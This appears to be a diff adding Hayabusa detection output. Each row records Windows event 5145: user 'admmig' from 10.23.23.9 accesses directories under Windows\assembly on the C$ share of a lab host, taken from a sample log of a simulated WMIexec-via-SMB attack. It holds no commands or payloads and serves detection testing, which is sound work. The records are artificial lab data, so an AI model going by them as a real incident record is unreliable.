+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
